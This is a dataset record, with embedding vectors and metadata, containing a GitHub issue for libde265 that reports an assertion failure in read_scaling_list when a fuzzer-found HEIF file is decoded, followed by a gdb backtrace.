0.009510191157460213, 0.012251454405486584, -0.011233052238821983, 0.024242565035820007, 0.010911451652646065, 0.026968512684106827, 0.0008279302855953574, -0.01559763215482235, 0.012550082989037037, 0.029847605153918266, 0.010513278655707836, -0.007909844629466534, -0.019326668232679367, 0.010505622252821922, 0.012435225769877434, 0.0011428309371694922, -0.0184690672904253, 0.014081515371799469, -0.0076112160459160805, -0.008859332650899887, 0.038071393966674805, 0.017779922112822533, -0.01632506214082241, 0.018805982545018196, -0.022374218329787254, 0.0033978642895817757, -0.014249972999095917, -0.018116837367415428, 0.01768803782761097 ]
null
null
null
null
null
null
null
null
null
[ "strukturag", "libde265" ]
Hello, I built libde265 and libheif from git and I am able to trigger following assert with [scaling_list_pred_matrix_id_delta.zip](https://github.com/strukturag/libde265/files/10058129/scaling_list_pred_matrix_id_delta.zip) ``` heif-convert clusterfuzz-testcase-minimized-kimgio_heif_fuzzer-6222100054016000.fuzz output.png File contains 1 image heif-convert: sps.cc:931: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==3' failed. ``` Same file in GIMP 2.99.14 for Windows create following message: `Assertion failed: scaling_list_pred_matrix_id_delta==3, file ../../libde265-1.0.9/libde265/sps.cc, line 931` There is another case https://github.com/strukturag/libde265/issues/313 which looks similar. ``` #0 0x00007ffff7ab0fac in __pthread_kill_implementation () from /lib64/libc.so.6 #1 0x00007ffff7a63b62 in raise () from /lib64/libc.so.6 #2 0x00007ffff7a4e471 in abort () from /lib64/libc.so.6 #3 0x00007ffff7a4e395 in __assert_fail_base.cold () from /lib64/libc.so.6 #4 0x00007ffff7a5cb12 in __assert_fail () from /lib64/libc.so.6 #5 0x00007ffff73ced3a in read_scaling_list (br=br@entry=0x7fffffffd290, sps=sps@entry=0x55555557e3d0, sclist=sclist@entry=0x55555557e64e, inPPS=inPPS@entry=false) at sps.cc:931 #6 0x00007ffff73d0693 in seq_parameter_set::read (this=this@entry=0x55555557e3d0, errqueue=errqueue@entry=0x55555557c978, br=br@entry=0x7fffffffd290) at sps.cc:350 #7 0x00007ffff73a914d in decoder_context::read_sps_NAL (this=this@entry=0x55555557c970, reader=...) at /usr/lib/gcc/x86_64-pc-linux-gnu/11.3.0/include/g++-v11/bits/shared_ptr_base.h:1295 #8 0x00007ffff73ab320 in decoder_context::decode_NAL (this=this@entry=0x55555557c970, nal=0x55555557c850) at decctx.cc:1248 #9 0x00007ffff73ab5fe in decoder_context::decode (this=0x55555557c970, more=0x7fffffffd354) at decctx.cc:1327 #10 0x00007ffff739ff44 in de265_decode (de265ctx=<optimized out>, more=<optimized out>) at de265.cc:352 #11 0x00007ffff7f760b3 in libde265_v1_decode_image (decoder_raw=0x55555557b850, out_img=0x7fffffffd410) at plugins/heif_decoder_libde265.cc:324 #12 0x00007ffff7f53e27 in heif::HeifContext::decode_image_planar (this=0x5555555780f0, ID=<optimized out>, img=std::shared_ptr<heif::HeifPixelImage> (empty) = {...}, out_colorspace=out_colorspace@entry=heif_colorspace_RGB, options=options@entry=0x55555557c8d0, alphaImage=false) at heif_context.cc:1181 #13 0x00007ffff7f550b3 in heif::HeifContext::decode_image_user (this=<optimized out>, ID=<optimized out>, img=std::shared_ptr<heif::HeifPixelImage> (empty) = {...}, out_colorspace=heif_colorspace_RGB, out_chroma=heif_chroma_interleaved_RGB, options=0x55555557c8d0) at heif_context.cc:1088 #14 0x00007ffff7f42d8e in heif_decode_image (in_handle=0x55555557b9e0, out_img=0x7fffffffd888, colorspace=<optimized out>, chroma=<optimized out>, options=<optimized out>) at heif.cc:946 #15 0x0000555555559644 in main (argc=<optimized out>, argv=<optimized out>) at heif_convert.cc:329 ```
Assertion `scaling_list_pred_matrix_id_delta==3' failed.
https://api.github.com/repos/strukturag/libde265/issues/361/comments
1
2022-11-21T16:24:26
2023-01-26T19:31:33Z
https://github.com/strukturag/libde265/issues/361
1,458,225,490
361
false
This is a GitHub Issue repo:libde265 owner:strukturag Title : Assertion `scaling_list_pred_matrix_id_delta==3' failed. Issue date: --- start body --- Hello, I built libde265 and libheif from git and I am able to trigger following assert with [scaling_list_pred_matrix_id_delta.zip](https://github.com/strukturag/libde265/files/10058129/scaling_list_pred_matrix_id_delta.zip) ``` heif-convert clusterfuzz-testcase-minimized-kimgio_heif_fuzzer-6222100054016000.fuzz output.png File contains 1 image heif-convert: sps.cc:931: de265_error read_scaling_list(bitreader*, const seq_parameter_set*, scaling_list_data*, bool): Assertion `scaling_list_pred_matrix_id_delta==3' failed. ``` Same file in GIMP 2.99.14 for Windows create following message: `Assertion failed: scaling_list_pred_matrix_id_delta==3, file ../../libde265-1.0.9/libde265/sps.cc, line 931` There is another case https://github.com/strukturag/libde265/issues/313 which looks similar. ``` #0 0x00007ffff7ab0fac in __pthread_kill_implementation () from /lib64/libc.so.6 #1 0x00007ffff7a63b62 in raise () from /lib64/libc.so.6 #2 0x00007ffff7a4e471 in abort () from /lib64/libc.so.6 #3 0x00007ffff7a4e395 in __assert_fail_base.cold () from /lib64/libc.so.6 #4 0x00007ffff7a5cb12 in __assert_fail () from /lib64/libc.so.6 #5 0x00007ffff73ced3a in read_scaling_list (br=br@entry=0x7fffffffd290, sps=sps@entry=0x55555557e3d0, sclist=sclist@entry=0x55555557e64e, inPPS=inPPS@entry=false) at sps.cc:931 #6 0x00007ffff73d0693 in seq_parameter_set::read (this=this@entry=0x55555557e3d0, errqueue=errqueue@entry=0x55555557c978, br=br@entry=0x7fffffffd290) at sps.cc:350 #7 0x00007ffff73a914d in decoder_context::read_sps_NAL (this=this@entry=0x55555557c970, reader=...) at /usr/lib/gcc/x86_64-pc-linux-gnu/11.3.0/include/g++-v11/bits/shared_ptr_base.h:1295 #8 0x00007ffff73ab320 in decoder_context::decode_NAL (this=this@entry=0x55555557c970, nal=0x55555557c850) at decctx.cc:1248 #9 0x00007ffff73ab5fe in decoder_context::decode (this=0x55555557c970, more=0x7fffffffd354) at decctx.cc:1327 #10 0x00007ffff739ff44 in de265_decode (de265ctx=<optimized out>, more=<optimized out>) at de265.cc:352 #11 0x00007ffff7f760b3 in libde265_v1_decode_image (decoder_raw=0x55555557b850, out_img=0x7fffffffd410) at plugins/heif_decoder_libde265.cc:324 #12 0x00007ffff7f53e27 in heif::HeifContext::decode_image_planar (this=0x5555555780f0, ID=<optimized out>, img=std::shared_ptr<heif::HeifPixelImage> (empty) = {...}, out_colorspace=out_colorspace@entry=heif_colorspace_RGB, options=options@entry=0x55555557c8d0, alphaImage=false) at heif_context.cc:1181 #13 0x00007ffff7f550b3 in heif::HeifContext::decode_image_user (this=<optimized out>, ID=<optimized out>, img=std::shared_ptr<heif::HeifPixelImage> (empty) = {...}, out_colorspace=heif_colorspace_RGB, out_chroma=heif_chroma_interleaved_RGB, options=0x55555557c8d0) at heif_context.cc:1088 #14 0x00007ffff7f42d8e in heif_decode_image (in_handle=0x55555557b9e0, out_img=0x7fffffffd888, colorspace=<optimized out>, chroma=<optimized out>, options=<optimized out>) at heif.cc:946 #15 0x0000555555559644 in main (argc=<optimized out>, argv=<optimized out>) at heif_convert.cc:329 ``` --- end body ---
3,247
[ -0.01912815496325493, 0.034130629152059555, -0.007876299321651459, -0.0001520307851023972, 0.05747101828455925, 0.0016003240598365664, 0.00894378311932087, 0.03453454002737999, -0.007537300698459148, 0.005925256293267012, -0.03066851943731308, -0.03297659382224083, 0.019373387098312378, 0.01524770725518465, -0.004598114173859358, -0.001567866769619286, -0.0170076135545969, 0.03372671455144882, -0.03237072378396988, -0.03724652901291847, 0.014468732289969921, -0.013163228519260883, -0.019532067701220512, 0.02843257412314415, -0.0045368061400949955, -0.01089843176305294, 0.0018626870587468147, -0.008244148455560207, -0.04466121271252632, -0.013148803263902664, 0.023268260061740875, 0.039958514273166656, -0.024768508970737457, 0.01654599793255329, 0.06335660070180893, -0.023874130100011826, 0.06670331209897995, 0.04950816556811333, 0.01542081218212843, 0.01432447787374258, 0.014064819552004337, -0.03632329776883125, -0.01810394786298275, 0.021378526464104652, -0.027740152552723885, -0.013134378008544445, 0.007479598745703697, 0.012304914183914661, -0.024436723440885544, 0.01594012975692749, 0.0008547082543373108, -0.04454580694437027, 0.004230265039950609, -0.05164313316345215, -0.006733081769198179, -0.028923040255904198, 0.0303800106048584, 0.03617904335260391, -0.003635214874520898, 0.020224489271640778, -0.024840636178851128, 0.018002968281507492, -0.017209568992257118, 0.0304954145103693, 0.023455791175365448, 0.01803182065486908, -0.00965784303843975, 0.009311632253229618, -0.05314337834715843, 0.00866248644888401, -0.015435238368809223, -0.052797168493270874, 0.03664065897464752, 0.02857682853937149, 0.02726411260664463, -0.01139611005783081, 0.03343820571899414, -0.005355450790375471, -0.027639172971248627, -0.00034260458778589964, -0.03271693363785744, 0.022301755845546722, -0.07812827080488205, 0.0056655979715287685, 0.024508850648999214, 0.00007528284913860261, -0.04760400578379631, -0.07610870897769928, -0.03713112324476242, 0.007205515168607235, -0.0493350587785244, 0.027942107990384102, -0.007580576930195093, 0.0075589390471577644, -0.005918043199926615, 0.02274894341826439, -0.016560424119234085, 0.00782580953091383, -0.06479915231466293, -0.05302797630429268, -0.041689567267894745, -0.006837666034698486, 0.008864442817866802, -0.014800517819821835, 0.022272903472185135, -0.01873866654932499, -0.023902980610728264, 0.016344042494893074, 0.03372671455144882, 0.11580756306648254, 0.0013983676908537745, -0.005701661575585604, -0.004428614862263203, -0.036756061017513275, -0.00931884441524744, -0.0025965820532292128, 0.028389297425746918, 0.0038263523019850254, 0.013884501531720161, -0.026254329830408096, 0.00666456064209342, -0.024379020556807518, -0.0034927634987980127, 0.036727212369441986, -0.01866653934121132, 0.041054848581552505, 0.0198061503469944, -0.02058512531220913, -0.0018140011234208941, -0.06347201019525528, -0.0303800106048584, -0.019690748304128647, 0.0035684972535818815, -0.02058512531220913, -0.0008384796092286706, -0.004533199593424797, -0.0332939513027668, 0.03589053452014923, 0.016286339610815048, 0.008157595060765743, -0.04157416522502899, -0.03138979151844978, 0.0483541302382946, 0.00667177326977253, -0.008929356932640076, 0.015666045248508453, -0.00658522080630064, -0.010609922930598259, -0.003822745755314827, -0.008828379213809967, -0.031158985570073128, -0.027523770928382874, 0.0384005643427372, -0.004201414063572884, 0.06289498507976532, 0.016098808497190475, 0.024580977857112885, 0.030120352283120155, 0.013870076276361942, -0.01324256882071495, -0.04541133716702461, -0.02165260910987854, 0.017440376803278923, -0.023224983364343643, 0.0056439596228301525, -0.01110760122537613, -0.02952890843153, 0.00465942220762372, 0.0384005643427372, 0.0198061503469944, 0.014136946760118008, 0.01941666379570961, 0.013567141257226467, 0.002553305821493268, -0.050777606666088104, -0.013797949068248272, 0.003074425272643566, 0.04189152270555496, -0.00615966971963644, -0.008777890354394913, 0.008265785872936249, -0.017050888389348984, 0.014988048933446407, 0.01025649905204773, 0.02974529005587101, -0.03389982134103775, 0.036467552185058594, -0.012377041392028332, 0.016445020213723183, 0.0028129639104008675, 0.03467879816889763, 0.016142085194587708, 0.007818597368896008, -0.020671678707003593, 0.006062298081815243, -0.028836486861109734, -0.004489923361688852, -0.04316096380352974, 0.01742595061659813, 0.013192079961299896, 0.010956133715808392, -0.005827884189784527, -0.019431089982390404, -0.009051973931491375, 0.014843794517219067, 0.023917406797409058, -0.016993187367916107, 0.04766170680522919, 0.01441103033721447, -0.02797095850110054, -0.04434385150671005, -0.018435733392834663, 0.010090606287121773, -0.007732044439762831, -0.01966189593076706, 0.017599055543541908, -0.01123743038624525, 0.022662391886115074, -0.004125680308789015, 0.015896853059530258, 0.019084878265857697, -0.0123337646946311, 0.010126669891178608, -0.040160469710826874, -0.03710227459669113, 0.00873461365699768, 0.018291478976607323, -0.009268355555832386, -0.026369733735919, 0.009607354179024696, 0.017238419502973557, -0.04269934818148613, 0.004147318657487631, 0.017974117770791054, 0.012391466647386551, -0.004601720254868269, -0.005762969609349966, -0.020570700988173485, -0.019330110400915146, -0.011958703398704529, -0.003696523141115904, 0.03525581583380699, -0.030120352283120155, -0.021176569163799286, -0.00944146141409874, 0.06987690925598145, -0.003296216716989875, -0.013769097626209259, -0.03563087806105614, 0.006249828729778528, -0.00003597911563701928, 0.004677454009652138, -0.014591348357498646, 0.036294449120759964, -0.00347833801060915, 0.0304954145103693, 0.006311137229204178, 0.02456655167043209, -0.038458265364170074, -0.027379516512155533, 0.041833821684122086, 0.004118467681109905, -0.031822554767131805, -0.015348684974014759, -0.006440965924412012, 0.005207589827477932, -0.010040117427706718, -0.006960282567888498, -0.008640848100185394, -0.04393994063138962, 0.033034294843673706, -0.029687589034438133, -0.011771172285079956, -0.011583641171455383, -0.0022143074311316013, 0.004482710268348455, 0.028865337371826172, 0.004410583060234785, 0.018262626603245735, 0.02687462419271469, 0.0019564523827284575, 0.024393446743488312, -0.027769003063440323, 0.04344947263598442, 0.010833517648279667, 0.0056655979715287685, 0.014713965356349945, -0.04085289314389229, -0.03424603119492531, -0.025302249938249588, -0.008294637314975262, 0.022734519094228745, -0.01803182065486908, -0.0004737860581371933, -0.014439881779253483, 0.006426540669053793, -0.00594689417630434, 0.009852586314082146, 0.00025447405641898513, -0.024869486689567566, -0.053691547363996506, 0.002374790608882904, 0.016820082440972328, -0.032918889075517654, -0.042785901576280594, -0.0010494518792256713, -0.026398584246635437, 0.017829863354563713, 0.0001530450681457296, -0.03202451393008232, 0.03144749253988266, 0.008871655911207199, -0.0031086858361959457, -0.026081224903464317, -0.03294774144887924, -0.017627907916903496, 0.015550641342997551, -0.0304954145103693, -0.03591938689351082, 0.012571784667670727, -0.023542344570159912, 0.003550465451553464, -0.04396878927946091, 0.03375556692481041, 0.023859703913331032, -0.020931337028741837, -0.03923724219202995, 0.021840140223503113, -0.06554926931858063, -0.008258573710918427, -0.011453812010586262, -0.00981652271002531, -0.031101282685995102, -0.01133840810507536, 0.01569489575922489, -0.033034294843673706, -0.06751113384962082, 0.02228732965886593, -0.012189510278403759, 0.02168145962059498, -0.018479010090231895, 0.00694946339353919, 0.0031068825628608465, -0.014728390611708164, 0.00022618664661422372, -0.04619031026959419, -0.0071189627051353455, 0.004443040583282709, 0.03375556692481041, -0.01873866654932499, 0.0009980612667277455, 0.05100841447710991, -0.0011098585091531277, 0.039843108505010605, 0.005254472140222788, -0.041516464203596115, -0.01888292282819748, -0.003682097652927041, 0.024840636178851128, 0.0000402616715291515, -0.005514130461961031, -0.03066851943731308, -0.004269935190677643, -0.008842804469168186, 0.0018094931729137897, -0.004305998794734478, 0.012131808325648308, -0.02668709307909012, 0.005149887874722481, -0.03248612582683563, -0.051239218562841415, 0.047084689140319824, -0.03941034525632858, 0.0286778062582016, -0.038919880986213684, -0.013264207169413567, 0.0012541130417957902, 0.011727895587682724, -0.027711300179362297, 0.008316275663673878, -0.048152171075344086, 0.014959197491407394, 0.0374196320772171, -0.0281873419880867, 0.04272820055484772, 0.016848932951688766, -0.019084878265857697, 0.0065671890042722225, -0.03923724219202995, -0.030120352283120155, -0.018868496641516685, 0.023080728948116302, -0.012413104996085167, -0.046449966728687286, 0.005131856072694063, 0.026095649227499962, -0.011562002822756767, -0.03632329776883125, -0.0032222862355411053, -0.018926197662949562, 0.009145739488303661, -0.009448673576116562, -0.0035180081613361835, 0.01503132563084364, -0.01547851413488388, 0.06260647624731064, 0.006588826887309551, -0.03248612582683563, 0.01746922731399536, 0.04330521821975708, 0.009189015254378319, -0.0027985384222120047, -0.006761932745575905, 0.0008465939317829907, 0.03188025951385498, 0.025965820997953415, -0.024826209992170334, 0.005636746995151043, -0.008453316986560822, 0.018089521676301956, -0.015391961671411991, -0.0010764996986836195, 0.01781543903052807, 0.01341567374765873, 0.01788756623864174, -0.005784607958048582, 0.0016318797133862972, 0.00333228032104671, 0.040160469710826874, -0.014209073968231678, -0.013495014049112797, -0.006141637917608023, 0.007075686007738113, 0.011756747029721737, -0.025013741105794907, -0.007097324356436729, -0.008987058885395527, -0.006931431591510773, -0.014786092564463615, -0.004327636677771807, 0.007219940889626741, 0.02853355184197426, -0.03251497820019722, 0.008922144770622253, -0.0015155745204538107, -0.00765991723164916, -0.02683134749531746, -0.012766528874635696, -0.033524759113788605, -0.0256340354681015, -0.020354319363832474, 0.04760400578379631, -0.034130629152059555, -0.022546987980604172, -0.012752103619277477, 0.021955544129014015, -0.011756747029721737, -0.009181803092360497, 0.041804973036050797, -0.0064445724710822105, 0.015622768551111221, 0.01661812514066696, 0.0160411074757576, -0.02559075877070427, 0.008244148455560207, 0.015911277383565903, 0.00033651883131824434, -0.024306893348693848, 0.0031177017372101545, 0.00386962853372097, -0.03430373594164848, -0.0013027989771217108, -0.021825715899467468, 0.018291478976607323, 0.004929899703711271, 0.014367754571139812, -0.039843108505010605, -0.02534552663564682, -0.003013117238879204, -0.03424603119492531, 0.029658738523721695, -0.018911773338913918, 0.020296616479754448, 0.014353328384459019, 0.029240399599075317, 0.013206505216658115, 0.005103005096316338, -0.01995040662586689, -0.02772572636604309, -0.0002560518332757056, -0.00859035924077034, 0.020282190293073654, -0.01016994658857584, -0.01781543903052807, 0.011699045076966286, 0.008042192086577415, -0.01693548634648323, -0.013617630116641521, 0.0384005643427372, 0.007393046282231808, -0.0006036151899024844, 0.006390477064996958, 0.02349906787276268, 0.009376546368002892, -0.0001784023188520223, -0.006123606115579605, 0.0026200234424322844, 0.0004918178892694414, 0.004489923361688852, -0.019719598814845085, 0.0027137889992445707, -0.03545777127146721, 0.0076743424870073795, -0.04336291924118996, 0.0003579316253308207, -0.024754082784056664, 0.012326552532613277, -0.009109675884246826, 0.02026776596903801, -0.0027119857259094715, -0.02175358682870865, -0.028634529560804367, 0.019647471606731415, 0.047863662242889404, 0.02580714039504528, 0.004745975136756897, 0.01281701773405075, -0.02036874368786812, -0.021219845861196518, -0.021133292466402054, 0.0018644902156665921, -0.014988048933446407, -0.024681955575942993, 0.013495014049112797, 0.008525444194674492, 0.013870076276361942, -0.02651398815214634, 0.006689805071800947, 0.00901591032743454, -0.021061165258288383, 0.0006144342478364706, 0.0056331404484808445, -0.03141864389181137, -0.010148308239877224, -0.04145875945687294, 0.026672668755054474, -0.0151900053024292, 0.026095649227499962, -0.015781449154019356, 0.0018112963298335671, 0.003909298684448004, -0.026369733735919, -0.0160411074757576, 0.026355307549238205, -0.008763464167714119, 0.019993681460618973, 0.016271915286779404, -0.0003737094812095165, 0.012348189949989319, -0.00988864991813898, 0.004006670322269201, -0.016762379556894302, 0.01924355886876583, -0.0029554152861237526, 0.001442545559257269, 0.017844289541244507, -0.008705763146281242, 0.017411526292562485, -0.037535037845373154, -0.014086457900702953, 0.002511832630261779, -0.0010404359782114625, 0.013927778229117393, -0.013805161230266094, 0.0018464584136381745, 0.026744795963168144, 0.00008553844963898882, -0.0170076135545969, -0.02282107062637806, -0.02051299810409546, 0.030899327248334885, -0.023210559040308, -0.022143075242638588, 0.0174980778247118, 0.030293457210063934, -0.019546493887901306, 0.015565067529678345, -0.02349906787276268, -0.005395120475441217, -0.0206572525203228, 0.003696523141115904, 0.03268808498978615, -0.025013741105794907, 0.013761885464191437, 0.020152362063527107, -0.013805161230266094, 0.009621779434382915, 0.008107106201350689, 0.02971643954515457, -0.012110169976949692, -0.05605732277035713, 0.01347337570041418, -0.004021096043288708, -0.04056438058614731, -0.028937464579939842, 0.021421803161501884, 0.010559434071183205, -0.021320823580026627, -0.007176664192229509, 0.010061755776405334, 0.024580977857112885, 0.00944146141409874, 0.042295437306165695, -0.001005274010822177, 0.01384122483432293, 0.00258215656504035, 0.007522875443100929, 0.010718113742768764, -0.02665824256837368, -0.001187395304441452, 0.022143075242638588, -0.03825630992650986, 0.02055627480149269, -0.000700085423886776, 0.017829863354563713, 0.04362257942557335, -0.017411526292562485, 0.019286835566163063, -0.01863768883049488, -0.030293457210063934, -0.016026681289076805, 0.030322307720780373, 0.0019708778709173203, -0.01878194324672222, -0.037073422223329544, 0.026600541546940804, 0.039987362921237946, -0.023628896102309227, 0.009059186093509197, -0.027552621439099312, 0.01650272123515606, -0.004760400392115116, 0.0004356938588898629, -0.00480007054284215, -0.028071938082575798, -0.00022832791728433222, 0.011150877922773361, 0.008027765899896622, 0.03147634491324425, 0.01226163748651743, -0.01216065976768732, -0.007277642376720905, 0.017310546711087227, 0.030755072832107544, 0.010068967938423157, -0.017685608938336372, 0.055884215980768204, 0.04437270388007164, -0.007941213436424732, -0.029629886150360107, -0.02836044691503048, 0.02675922028720379, 0.00022122789232525975, -0.007833022624254227, 0.03176485374569893, -0.01987827755510807, -0.005885586142539978, -0.021349674090743065, 0.03421718254685402, -0.019503217190504074, 0.003346705809235573, -0.020253339782357216, 0.02797095850110054, 0.017757736146450043, 0.018190499395132065, -0.022388307377696037, 0.022763369604945183, 0.02903844229876995, 0.021147718653082848, 0.00809268094599247, 0.006981920916587114, -0.0014091867487877607, 0.025936970487236977, 0.016560424119234085, -0.03883332759141922, -0.0001086417178157717, 0.010508944280445576, -0.009859799407422543, 0.005254472140222788, -0.01432447787374258, 0.03294774144887924, 0.028620105236768723, 0.02748049423098564, 0.010076181031763554, 0.00958571583032608, -0.0166469756513834, 0.01810394786298275, -0.016603700816631317, -0.004846953321248293, -0.02129197306931019, -0.0019618619699031115, 0.010061755776405334, -0.0069747078232467175, -0.005359056871384382, 0.0024126574862748384, 0.009311632253229618, -0.001484018750488758, -0.019690748304128647, -0.0391218364238739, 0.004630571231245995, -0.009066399186849594, 0.001996122533455491, -0.0018167059170082211, 0.01725284568965435, 0.010559434071183205, -0.008157595060765743, -0.027812279760837555, -0.004991207737475634, -0.028807636350393295, 0.019863853231072426, 0.002654284005984664, -0.02410493791103363, -0.028317170217633247, -0.010797454044222832, 0.022763369604945183, -0.012982910498976707, 0.0011486269067972898, 0.002481178380548954, 0.015507365576922894, 0.013199292123317719, -0.03866022080183029, -0.032601531594991684, 0.003034755354747176, 0.018233776092529297, 0.0006689805304631591, 0.006769145373255014, 0.014367754571139812, -0.013444525189697742, 0.01948879100382328, 0.022662391886115074, 0.018507860600948334, -0.020758232101798058, 0.0033142485190182924, -0.009953564964234829, -0.003626198973506689, -0.039987362921237946, 0.017873140051960945, 0.0041761696338653564, -0.055884215980768204, 0.01725284568965435, 0.024479998275637627, 0.021594908088445663, 0.025677312165498734, -0.03698686882853508, -0.006477029994130135, 0.002349546179175377, 0.02833159640431404, -0.014843794517219067, -0.016993187367916107, -0.0004665733431465924, -0.016762379556894302, -0.008193658664822578, -0.015507365576922894, 0.011071537621319294, 0.0349961556494236, -0.0183491799980402, 0.0028670593164861202, -0.0015354094794020057, 0.013639268465340137, -0.011901001445949078, 0.024076085537672043, 0.026369733735919, -0.006704230792820454, -0.02510029263794422, 0.020224489271640778, -0.015117878094315529, -0.022489285096526146, 0.020743805915117264, 0.01863768883049488, 0.03237072378396988, -0.02590811997652054, -0.011201366782188416, -0.03433258458971977, 0.018623264506459236, -0.005932468920946121, -0.014115308411419392, 0.015276557765901089, -0.02080150693655014, 0.007501237094402313, 0.019546493887901306, -0.01097055897116661, -0.032918889075517654, 0.031822554767131805, -0.008640848100185394, -0.033640164881944656, -0.013235355727374554, -0.0166469756513834, 0.005492492578923702, -0.02473965659737587, -0.03095702826976776, 0.009109675884246826, -0.007522875443100929, 0.009946351870894432, -0.03664065897464752, -0.024263616651296616, -0.006581614259630442, -0.004511561244726181, 0.020296616479754448, -0.008777890354394913, 0.02729296311736107, -0.014930346980690956, -0.020888060331344604, 0.017599055543541908, 0.02928367629647255, 0.010725326836109161, 0.006029840558767319, -0.021003464236855507, -0.03560202568769455, -0.010054542683064938, 0.02641301043331623, -0.013978267088532448, 0.02587926760315895, -0.006758326198905706, -0.015853576362133026, -0.021768013015389442, -0.03006265126168728, -0.0016417972510680556, 0.010285350494086742, 0.04096829518675804, -0.023441366851329803, 0.011403323151171207, 0.010177159681916237, -0.011417748406529427, 0.02143622748553753, -0.03237072378396988, 0.01710859127342701, -0.0143389031291008, 0.010487306863069534, -0.025042591616511345, 0.05034484341740608, 0.00458008237183094, 0.008763464167714119, -0.0060947551392018795, 0.002441508462652564, 0.015925703570246696, -0.039064135402441025, -0.017195142805576324, 0.012153446674346924, -0.011302344501018524, -0.014591348357498646, 0.025850417092442513, 0.041199102997779846, 0.0006108279339969158, 0.011129239574074745, -0.004226658493280411, 0.010732538998126984, -0.015997830778360367, -0.01066762488335371, -0.0027282144874334335, -0.017656758427619934, 0.02367217279970646, 0.02051299810409546, 0.0004514716856647283, -0.011857724748551846, 0.040131617337465286, 0.0050813667476177216, 0.004785644821822643, -0.024436723440885544, 0.006650135386735201, 0.0023729875683784485, -0.002156605711206794, -0.04549788683652878, 0.03834286332130432, -0.01255014631897211, -0.032601531594991684, 0.009225078858435154, -0.022546987980604172, -0.05008518323302269, -0.005979351699352264, 0.028389297425746918, 0.01810394786298275, -0.0031826163176447153, -0.005918043199926615, 0.02857682853937149, 0.0309858787804842, -0.02172473631799221, 0.003144749440252781, -0.02512914501130581, -0.022128649055957794, -0.008496593683958054, -0.0028327989857643843, 0.009989628568291664, -0.036438703536987305, -0.017123015597462654, 0.021667035296559334, 0.038602519780397415, -0.0012360812397673726, -0.009737182408571243, -0.016805656254291534, -0.031072432175278664, -0.002906729467213154, -0.02471080608665943, 0.01643059402704239, -0.016098808497190475, -0.005799033213406801, -0.0340152271091938, 0.025706162676215172, 0.017368249595165253, -0.015016899444162846, 0.005781001411378384, 0.028951890766620636, -0.007724831812083721, 0.0003951222461182624, -0.051383472979068756, -0.005041697062551975, 0.010335839353501797, -0.02374430000782013, 0.018147224560379982, 0.0019636652432382107, 0.05181623995304108, -0.014872645027935505, -0.008850017562508583, -0.003692916827276349, 0.007256004493683577, 0.0030365583952516317, -0.05181623995304108, -0.025994671508669853, 0.012153446674346924, -0.01151872705668211, 0.01849343441426754, -0.0044935294426977634, -0.0051643131300807, 0.01927240937948227, -0.019157005473971367, -0.012449168600142002, -0.0008254065760411322, -0.007227153517305851, 0.02403281070291996, -0.008813953958451748, -0.019056027755141258, 0.005820671562105417, 0.017382673919200897, 0.000350042711943388, -0.02853355184197426, 0.015391961671411991, 0.006913399789482355, 0.0070071653462946415, -0.014959197491407394, 0.004165350459516048, -0.01334354653954506, -0.01167740672826767, -0.02595139481127262, -0.008013340644538403, -0.0014912314945831895, -0.005258078686892986, 0.008691336959600449, -0.025143569335341454, -0.016459444537758827, -0.016142085194587708, 0.01618536189198494, -0.011872150003910065, 0.015983404591679573, -0.02740836702287197, 0.0010106834815815091, -0.024797359481453896, 0.0016526163090020418, -0.04065093398094177, -0.0034657157957553864, -0.02318170852959156, -0.025475354865193367, 0.01902717724442482, 0.00765991723164916, -0.014872645027935505, 0.015016899444162846, -0.021825715899467468, 0.026167776435613632, -0.0035180081613361835, -0.04336291924118996, -0.02233060635626316, -0.03369786590337753, -0.03594823554158211, -0.030178053304553032, 0.030726222321391106, -0.01359599269926548, 0.00046116378507576883, -0.026600541546940804, 0.01640174351632595, 0.015795873478055, -0.016127659007906914, 0.02495603822171688, -0.004648603033274412, -0.0029644311871379614, 0.026110075414180756, -0.04102599620819092, 0.03297659382224083, 0.020008107647299767, -0.004735155962407589, -0.012629486620426178, 0.00944146141409874, -0.004132892936468124, -0.032890040427446365, -0.02634088322520256, 0.032139915972948074, 0.008056617341935635, -0.0020682497415691614, 0.021465077996253967, -0.016199788078665733, 0.01572374626994133, -0.011403323151171207, -0.004479104187339544, 0.019402237609028816, -0.010415179654955864, 0.01654599793255329, -0.013228143565356731, 0.009737182408571243, -0.015161153860390186, -0.01944551430642605, 0.03531351685523987, 0.03687146678566933, 0.033351656049489975, -0.014959197491407394, -0.003956181462854147, -0.011049899272620678, -0.02104674093425274, 0.005301354918628931, 0.007926788181066513, -0.029240399599075317, -0.012052468955516815, 0.02857682853937149, -0.006130818743258715, -0.006408508867025375, -0.0027228049002587795, -0.004489923361688852, 0.013574354350566864, -0.010105031542479992, -0.030466563999652863, 0.012557359412312508, -0.03424603119492531, -0.021638184785842896, 0.0021493928506970406, 0.031158985570073128, 0.018724242225289345, -0.008431678637862206, -0.026845773681998253, -0.011742320843040943, 0.009189015254378319, -0.0021548024378716946, 0.01540638692677021, -0.0006653741584159434, -0.028446998447179794, 0.006559976376593113, 0.013466163538396358, 0.04466121271252632, -0.008099894039332867, 0.0008127843029797077, 0.03765043988823891, 0.002775097033008933, -0.027076581493020058, 0.0016264701262116432, 0.012139021418988705, -0.0052833231166005135, -0.028100788593292236, 0.006992739625275135, -0.008720188401639462, -0.015983404591679573, -0.01109317597001791, -0.01601225696504116, 0.02527339942753315, -0.004630571231245995, 0.003541449550539255, -0.01973402313888073, 0.015276557765901089, -0.01586800254881382, -0.019056027755141258, 0.02971643954515457, 0.0022810252849012613, 0.0345056913793087, -0.012131808325648308, -0.021061165258288383, -0.004378126002848148, -0.008720188401639462, 0.0034260458778589964, 0.005625927820801735, 0.010573859326541424, -0.03193796053528786, 0.026009097695350647, 0.026312032714486122, -0.0040535531006753445, 0.019431089982390404, -0.005618715193122625, -0.013942203484475613, -0.01618536189198494, -0.023686598986387253, 0.0016814671689644456, -0.01715186797082424, 0.008135957643389702, 0.022777795791625977, 0.08234050124883652, 0.01332912128418684, -0.016026681289076805, -0.008301850408315659, -0.01912815496325493, -0.00343866809271276, -0.010746965184807777, 0.02942793071269989, -0.005788214039057493, 0.005056122317910194, 0.019012751057744026, 0.004129286855459213, -0.007443535141646862, 0.013365184888243675, 0.013307482935488224, -0.008402828127145767, -0.0015002473955973983, 0.008359551429748535, 0.005586257670074701, 0.000393319089198485, -0.0019113728776574135, 0.01448315754532814, -0.00036334118340164423, -0.009852586314082146, 0.0005968532641418278, -0.0021187388338148594, -0.02537437714636326, 0.0005657483707182109, -0.025922544300556183, 